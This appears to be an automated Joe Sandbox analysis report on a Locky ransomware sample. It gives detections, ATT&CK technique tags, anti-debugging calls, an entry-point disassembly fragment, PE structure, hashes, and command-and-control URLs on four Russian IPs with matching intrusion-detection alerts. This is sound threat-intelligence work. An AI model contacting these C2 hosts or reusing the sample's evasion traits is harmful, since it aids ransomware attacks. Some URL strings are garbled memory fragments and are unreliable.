Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\LockyRansom.exeAPI call chain: ExitProcess graph end nodegraph_0-30145
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040C58C rdtsc 0_2_0040C58C
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00405393
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004079B0
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_005C007E push dword ptr fs:[00000030h]0_2_005C007E
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_005C03EE push dword ptr fs:[00000030h]0_2_005C03EE
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0069007E push dword ptr fs:[00000030h]0_2_0069007E
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_006903EE push dword ptr fs:[00000030h]0_2_006903EE
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00405393
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00403A6C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00403A6C
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00405F08 SetUnhandledExceptionFilter,0_2_00405F08
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0041973D SetSecurityDescriptorDacl,0_2_0041973D
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_004197BD AllocateAndInitializeSid,0_2_004197BD
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: GetLocaleInfoA,GetUserDefaultUILanguage,0_2_0042E700
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00406718 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00406718
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00423053 GetVersionExA,0_2_00423053
Source: C:\Users\user\Desktop\LockyRansom.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services11
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS Memory21
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
Obfuscated Files or Information
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive11
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook21
Software Packing
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets114
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
LockyRansom.exe96%ReversingLabsWin32.Ransomware.Locky
LockyRansom.exe100%AviraTR/Lethic.X
LockyRansom.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://37.143.9.154/imageload.cgiy0%Avira URL Cloudsafe
http://37.143.9.154/imageload.cgiC0%Avira URL Cloudsafe
https://www.torproject.org/download/download-easy.html0%Avira URL Cloudsafe
http://46.17.44.153/imageload.cgiL0%Avira URL Cloudsafe
http://46.17.44.153/imageload.cgiV0%Avira URL Cloudsafe
http://46.183.165.45/imageload.cgia-deddda9762880%Avira URL Cloudsafe
http://46.17.44.1531oad.cgi%8800%Avira URL Cloudsafe
http://46.17.44.153/imageload.cgi0%Avira URL Cloudsafe
http://46.17.44.153/imageload.cgi0.31/imageload.cgi0%Avira URL Cloudsafe
http://37.143.9.154/imageload.cgi0%Avira URL Cloudsafe
http://37.143.9.154/imag=0%Avira URL Cloudsafe
http://46.17.44.153/imageload.cgiP0%Avira URL Cloudsafe
http://46.183.165.45/imageload.cgi0%Avira URL Cloudsafe
http://185.179.190.31/imageload.cgir0%Avira URL Cloudsafe
http://46.17.44.1530%Avira URL Cloudsafe
http://37.143.9.154/imageload.cgilh0%Avira URL Cloudsafe
http://185.179.190.31/imageload.cgin0%Avira URL Cloudsafe
http://37.143.9.154/imageload.cgid0%Avira URL Cloudsafe
http://37.143.9.154/imageload.cgii0%Avira URL Cloudsafe
http://46.17.44.153/imageload.cgiy30%Avira URL Cloudsafe
http://46.17.44.153/0%Avira URL Cloudsafe
http://46.17.44.153/imageload.cgii0%Avira URL Cloudsafe
http://46.17.44.153/imageload.cgik0%Avira URL Cloudsafe
http://46.183.165.45/0%Avira URL Cloudsafe
http://46.17.44.153/imageload.cgi00%Avira URL Cloudsafe
http://37.143.9.154/imageload.cgiP0%Avira URL Cloudsafe
http://185.179.190.31/imageload.cgi0%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://46.17.44.153/imageload.cgitrue
  • Avira URL Cloud: safe
unknown
http://37.143.9.154/imageload.cgitrue
  • Avira URL Cloud: safe
unknown
http://46.183.165.45/imageload.cgitrue
  • Avira URL Cloud: safe
unknown
http://185.179.190.31/imageload.cgitrue
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://46.17.44.153/imageload.cgi0.31/imageload.cgiLockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://37.143.9.154/imageload.cgiCLockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://37.143.9.154/imageload.cgiyLockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.17.44.1531oad.cgi%880LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.torproject.org/download/download-easy.htmlLockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.17.44.153/imageload.cgiLLockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.183.165.45/imageload.cgia-deddda976288LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.17.44.153/imageload.cgiVLockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://37.143.9.154/imag=LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.17.44.153/imageload.cgiPLockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://185.179.190.31/imageload.cgirLockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://37.143.9.154/imageload.cgiiLockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://37.143.9.154/imageload.cgilhLockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.17.44.153/imageload.cgiy3LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.17.44.153LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://185.179.190.31/imageload.cginLockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://37.143.9.154/imageload.cgidLockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.17.44.153/LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.17.44.153/imageload.cgiiLockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.17.44.153/imageload.cgikLockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://37.143.9.154/imageload.cgiPLockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.183.165.45/LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://46.17.44.153/imageload.cgi0LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
46.17.44.153
unknownRussian Federation
51659ASBAXETRUtrue
46.183.165.45
unknownRussian Federation
197695AS-REGRUtrue
37.143.9.154
unknownRussian Federation
203226IHCRUInternet-HostingLtdMoscowRussiaRUtrue
185.179.190.31
unknownRussian Federation
44094WEBHOST1-ASRUtrue
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1446225
Start date and time:2024-05-23 01:12:08 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 26s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:17
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:LockyRansom.exe
Detection:MAL
Classification:mal96.rans.evad.winEXE@1/0@0/4
EGA Information:
  • Successful, ratio: 100%
HCA Information:Failed
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: LockyRansom.exe
TimeTypeDescription
20:22:08API Interceptor1x Sleep call for process: LockyRansom.exe modified
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
ASBAXETRUpwguyxhjpT.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 176.32.38.160
bpx6Q6xdPI.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 176.32.38.160
O7HAqYMIla.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 176.32.38.160
rK3zT4c1vM.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 176.32.38.160
5ywdg9jlhJ.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 176.32.38.160
SecuriteInfo.com.PUA.Tool.Linux.BtcMine.4274.18395.31150.elfGet hashmaliciousXmrigBrowse
  • 46.17.41.146
gy1E0Bz4tw.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 176.32.38.160
z7btK4svLL.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 176.32.38.160
kk6Pr8ufJ8.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 176.32.38.160
iiDO5j8jHv.elfGet hashmaliciousGafgyt, MiraiBrowse
  • 176.32.38.160
WEBHOST1-ASRUNitro.exeGet hashmaliciousAsyncRATBrowse
  • 45.84.1.233
SecuriteInfo.com.Win32.Evo-gen.26417.20881.exeGet hashmaliciousAsyncRATBrowse
  • 45.84.1.233
zY7L2l2Gt6.exeGet hashmaliciousNetSupport RATBrowse
  • 45.67.230.205
zY7L2l2Gt6.exeGet hashmaliciousNetSupport RATBrowse
  • 45.67.230.205
rtn_default.elfGet hashmaliciousUnknownBrowse
  • 45.84.1.161
5AgUnnh6yG.exeGet hashmaliciousAsyncRATBrowse
  • 45.84.1.233
DHL_AWB_NO_#907853880911_pdf .exeGet hashmaliciousAgentTeslaBrowse
  • 45.84.1.117
SKM_C308Cen22092912580_pdf .exeGet hashmaliciousAgentTeslaBrowse
  • 45.84.1.117
zam#U00f3wienie Z2300056_pdf .exeGet hashmaliciousUnknownBrowse
  • 45.84.1.117
ZAM#U00d3WIENIE_DR-5-33499_pdf.exeGet hashmaliciousAgentTeslaBrowse
  • 45.84.1.117
IHCRUInternet-HostingLtdMoscowRussiaRUKtMg6d1Ivx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
  • 185.87.199.107
https://googleads.g.doubleclick.net/pcs/click?xai=AKAOjsuLaMSxRbnmx4CaSYBD7UEX1peDpNeYnMWW4dVza-G52TGjr2vj5pKsC0MnZ5wKKbv48DTu4_9zifCV__nn-40JMtKyE_J-VMT8wv7a1Lf0nNBgkN5ubnqB_fbDSNDoYvSXrEeZ7mt6jhn1Gl78NJ_xm24v553oIbpIcOlySTxRzwS3ROTWKkuLKGhJpg1kkeB-2p7L0D_C0Tx_5HYnjwuOs8n8jzqBq4O3iSh2WW3Es8m8o5Fm3xTlO9UbT5wj7XWQmwefhVbuqmrnfemDwqzjrWGaSNRRqB_R9QTXSQjdFDdWTx0_Oo7RzbAWcjKqQR2JbLAW_ZYkDd6cz8q8BYpJJzzkZ6QKuyXH_CCgkPoul09CafKLox9uieqQMwQ&sai=AMfl-YQSMSxmTEvfKP4k3QH0IYz2PIsK1wo62PVWE2-bo7ZdB4Yue3XhmrRw5NnkQ1uiDEixQcvMUgBuCbvmwfqOzcwUGUmidc9tgXXMjS8Z7zb-8rHzyMziFnJ7Kv7S6gwBuwmLhiK3qougMvlVE4DWmw&sig=Cg0ArKJSzCxoV_8QjjEU&fbs_aeid=%5Bgw_fbsaeid%5D&adurl=https://dubaieventhost.com?26utm_source%3Dacuityads%26utm_medium%3Ddisplay%26utm_campaign%3D23%26utm_content%3D728x90_CyberWeek%26utm_term%3DNOOFR%26dclid%3D%25edclid!Get hashmaliciousUnknownBrowse
  • 95.183.11.171
xd.arm.elfGet hashmaliciousMiraiBrowse
  • 185.22.233.198
epce3FXdZM.exeGet hashmaliciousDCRatBrowse
  • 217.144.103.11
Wcu8q856Mc.elfGet hashmaliciousMiraiBrowse
  • 185.87.196.219
https://email-01.moengage.com/v1/emailclick?em=lindamine16%40gmail.com&user_id=%40%24xy%2A%40%21h%C3%9F%03%C2%90%C2%9B%C3%AB%C3%9A%C3%98%C3%B2%C2%B9%C3%B3%05En%7D%17%C2%8E%C3%8F4%C2%93%C2%89%C3%98b%C2%98%1D%C3%9A%13%C2%BA%C2%94%0B%C3%91IZ&d=%40%24xy%2A%40%21ho%15Tz%C2%88%C3%9B%C2%A4%C3%A1%C2%9A%C3%A4%1A3%3E%5D-%C2%AD&cid=%40%24xy%2A%40%21h%2F%C3%AF.%C2%ACH%5D%7C%C2%AErB%C2%BA%C2%9E%C2%84_%21%C2%BD%3Ct%C2%8D%C3%A8%C3%A4TZ%C2%B7%C2%A2A%C2%A8%3B%C3%91%07%5E%C3%AF%5B%C3%8F%C3%A3X%C3%B6%1B+%C2%85V%C2%99%C2%90E%C2%9C9%C2%91%C3%85%01%C2%89%C2%A0%12_%03%C3%A9%16%C2%A9%C3%B9r%C2%87%C3%801%C2%8E%C3%A2%C2%93Q%0Eb%C2%83%C3%AF%C2%B7%C2%B2%C3%A46JP%C3%A6%C2%85%C3%8F%40%C3%B2P%C2%83%C2%B3&ut=l&moeclickid=643d07278baad406b95a7b15_F_T_EM_AB_0_P_0_TIME_2023-04-17+08%3A45%3A55.063339_L_0ecli8&rlink=https%3A%2F%2Fs.free.fr%2F8JnuegfdGet hashmaliciousUnknownBrowse
  • 37.143.14.168
b8bK6XA6sN.exeGet hashmaliciousDCRatBrowse
  • 217.144.103.26
djqkablrmx.exeGet hashmaliciousUnknownBrowse
  • 95.183.12.119
MHSB7tmAIJ.exeGet hashmaliciousCryptoWallBrowse
  • 37.143.11.11
3wjjsE9fZZ.exeGet hashmaliciousCryptoWallBrowse
  • 37.143.11.11
AS-REGRUquotation.exeGet hashmaliciousFormBookBrowse
  • 194.58.112.174
file.exeGet hashmaliciousUnknownBrowse
  • 31.31.196.120
FRA.0038253.exeGet hashmaliciousFormBook, GuLoaderBrowse
  • 37.140.192.90
FRA.0038253.exeGet hashmaliciousFormBook, GuLoaderBrowse
  • 37.140.192.90
SSDQ115980924.exeGet hashmaliciousFormBookBrowse
  • 194.58.112.174
Payment invoice.exeGet hashmaliciousFormBookBrowse
  • 194.58.112.174
quote.exeGet hashmaliciousFormBookBrowse
  • 194.58.112.174
Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
  • 31.31.196.77
OX-IN-031-17_ JPE.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
  • 194.58.112.174
SecuriteInfo.com.Win32.PWSX-gen.6793.10953.exeGet hashmaliciousFormBookBrowse
  • 194.58.112.174
No context
No context
No created / dropped files found
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.785619133351701
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.94%
  • Win16/32 Executable Delphi generic (2074/23) 0.02%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:LockyRansom.exe
File size:614'400 bytes
MD5:1720b1748ad7b8ac0bfc1c3636fead95
SHA1:97bae63417df5bde4a05cd44c6c523db50f6ab76
SHA256:3329641a171508fa6b1ad7674b31431093d46be190d1a51acd77e486f42d9c8e
SHA512:36d1f098c9ef9a80b42ad058c2a86e5cee794d12f74e479a79059197b82c847d8f88b256f17e2276fc0a9e21cf9b3210c563017d03d9c4ff3638484190a16b76
SSDEEP:12288:aKVWGHUsNNXxgAQWE9J4TyP5SqWiboPZnVXDsm:/UANB/Q7wqWicLXD
TLSH:1CD4D09C5380E270F4B405B3558C8FFDC9BAECA147461AAE13F253F1AA027837F5A956
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O1Q.....................x....................@..........................p.............................................
Icon Hash:00928e8e8686b000
Entrypoint:0x40cab5
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x51314FC7 [Sat Mar 2 01:03:03 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:87b1bf5d6ea7e7bea778583978f61b64
Instruction
push eax
mov dword ptr [esp], ebp
inc ecx
mov ebp, esp
sub esp, 30h
cmp bp, FCFEh
jc 00007FDC487B5859h
lea edi, dword ptr [004141B5h]
push dword ptr [edi]
call 00007FDC487B7B11h
push 004141A8h
push 004141A8h
call 00007FDC487BF8A1h
push 004141A8h
push 004141A8h
call 00007FDC487BF892h
mov eax, 0000000Fh
push eax
push 00414180h
push 00414177h
call 00007FDC487B98FAh
test eax, eax
jne 00007FDC487B9125h
mov eax, 0000000Fh
push eax
push 00414180h
push 00414177h
call 00007FDC487B98DDh
test eax, eax
jne 00007FDC487B9108h
lea edi, dword ptr [004045A3h]
call 00007FDC487B603Eh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
lea edx, dword ptr [004141B5h]
push dword ptr [edx]
call 00007FDC487B7A9Bh
push 004141A8h
push 004141A8h
call 00007FDC487BF82Bh
lea edi, dword ptr [004141B5h]
push dword ptr [edi]
call 00007FDC487B7A7Fh
mov eax, 00000010h
push eax
push 00414198h
push 0041418Fh
call 00007FDC497BD628h
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x960040xb4.dec
IMAGE_DIRECTORY_ENTRY_RESOURCE0xd60000xd70.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x12000x1c.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x957bc0x14c.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000xdb540xdc006bc820bd1ab6433528f62df7c9fd9e1bFalse0.31221590909090907data4.910527615535297IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE
.rdata0xf0000x869080x86a00d26955b7f888466a914f3c11e80dafc1False0.9625261142061281data7.910838175775477IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dec0x960000x400000x800cfc2407bbd549a4030bf935f1ea84f16False0.576171875Matlab v4 mat-file (little endian) \274W\011, numeric, rows 614584, columns 05.180594554872846IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc0xd60000xd700xe00a4235b9c316078526ec2006da1881b10False0.08900669642857142Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0, imaginary6.426023666341516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
NameRVASizeTypeLanguageCountryZLIB Complexity
OPS0xd61700x200Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - right0.34375
IKQ0xd63700x200Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - rightEnglishUnited States0.34375
IKQ0xd65700x200Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - rightEnglishUnited States0.34375
IKQ0xd67700x200Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - rightEnglishUnited States0.34375
IKQ0xd69700x200Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - rightEnglishUnited States0.34375
IKQ0xd6b700x200Targa image data - RGBA (1027-1541) 3340 x 3854 x 16 +2312 +2816 - 1-bit alpha - rightEnglishUnited States0.34375
DLLImport
clbcatq.dllDowngradeAPL, SetSetupSave
cfgmgr32.dllCM_Add_Empty_Log_Conf, CMP_Report_LogOn, CM_Add_IDA, CM_Add_Range
user32.dllwsprintfA, LoadBitmapW, IsDialogMessageA, DispatchMessageW, PostMessageW, CharToOemA, LoadIconA, IsCharLowerW, DialogBoxParamA, MessageBoxA, GetClassLongA, DrawStateW, PeekMessageW, InsertMenuW
cryptdll.dllMD5Update, MD5Final
kernel32.dllGetCommandLineW, InterlockedIncrement, CreateNamedPipeA, GetEnvironmentVariableW, WaitForSingleObject, GetLocalTime, CreateThread, GetModuleFileNameW, FindClose, FindResourceExA, OpenProcess, GlobalAddAtomA, GetConsoleTitleA, SetPriorityClass, FindNextFileW, CreateFileMappingW, FindFirstFileW, FormatMessageA, CloseHandle, GetLogicalDriveStringsA, GetProcAddress, GetPrivateProfileStringA, CreateDirectoryA, CreateSemaphoreW, LoadLibraryA, SetEnvironmentVariableA, GetModuleHandleA
shlwapi.dllUrlGetPartW, PathCompactPathW, UrlCreateFromPathW, UrlCombineA, UrlEscapeW, UrlCompareW, UrlUnescapeW, PathIsRootW, UrlHashA, UrlIsNoHistoryW, UrlGetLocationA, PathCommonPrefixW, UrlIsW, PathCombineA
rsaenh.dllCPDecrypt, CPDeriveKey
shell32.dllShell_NotifyIconA, DllCanUnloadNow, DragQueryFileA, DllGetVersion, SHBrowseForFolderW, SHGetFolderPathA, StrChrA, ExtractIconW, SHEmptyRecycleBinA, SHCreateDirectoryExA
Language of compilation systemCountry where language is spokenMap
EnglishUnited States
TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
05/23/24-01:13:30.810315TCP2023551ET TROJAN Locky CnC checkin Nov 214970480192.168.2.7185.179.190.31
05/23/24-01:13:53.178351TCP2023551ET TROJAN Locky CnC checkin Nov 214970680192.168.2.746.17.44.153
05/23/24-01:13:53.178351TCP2023577ET TROJAN Locky CnC Checkin HTTP Pattern4970680192.168.2.746.17.44.153
05/23/24-01:13:53.178351TCP2023552ET TROJAN Locky CnC checkin Nov 21 M24970680192.168.2.746.17.44.153
05/23/24-01:13:52.300122TCP2023551ET TROJAN Locky CnC checkin Nov 214970580192.168.2.737.143.9.154
05/23/24-01:13:52.300122TCP2023552ET TROJAN Locky CnC checkin Nov 21 M24970580192.168.2.737.143.9.154
05/23/24-01:13:52.300122TCP2023577ET TROJAN Locky CnC Checkin HTTP Pattern4970580192.168.2.737.143.9.154
05/23/24-01:14:14.647859TCP2023552ET TROJAN Locky CnC checkin Nov 21 M24970880192.168.2.746.183.165.45
05/23/24-01:14:36.143686TCP2023577ET TROJAN Locky CnC Checkin HTTP Pattern4970980192.168.2.7185.179.190.31
05/23/24-01:14:58.402198TCP2023551ET TROJAN Locky CnC checkin Nov 214971180192.168.2.746.17.44.153
05/23/24-01:14:14.647859TCP2023551ET TROJAN Locky CnC checkin Nov 214970880192.168.2.746.183.165.45
05/23/24-01:14:57.599658TCP2023577ET TROJAN Locky CnC Checkin HTTP Pattern4971080192.168.2.737.143.9.154
05/23/24-01:14:58.402198TCP2023552ET TROJAN Locky CnC checkin Nov 21 M24971180192.168.2.746.17.44.153
05/23/24-01:14:36.143686TCP2023552ET TROJAN Locky CnC checkin Nov 21 M24970980192.168.2.7185.179.190.31
05/23/24-01:14:36.143686TCP2023551ET TROJAN Locky CnC checkin Nov 214970980192.168.2.7185.179.190.31
05/23/24-01:14:58.402198TCP2023577ET TROJAN Locky CnC Checkin HTTP Pattern4971180192.168.2.746.17.44.153
05/23/24-01:14:14.647859TCP2023577ET TROJAN Locky CnC Checkin HTTP Pattern4970880192.168.2.746.183.165.45
05/23/24-01:14:57.599658TCP2023551ET TROJAN Locky CnC checkin Nov 214971080192.168.2.737.143.9.154
05/23/24-01:14:57.599658TCP2023552ET TROJAN Locky CnC checkin Nov 21 M24971080192.168.2.737.143.9.154
05/23/24-01:13:30.810315TCP2023577ET TROJAN Locky CnC Checkin HTTP Pattern4970480192.168.2.7185.179.190.31
05/23/24-01:13:30.810315TCP2023552ET TROJAN Locky CnC checkin Nov 21 M24970480192.168.2.7185.179.190.31
TimestampSource PortDest PortSource IPDest IP
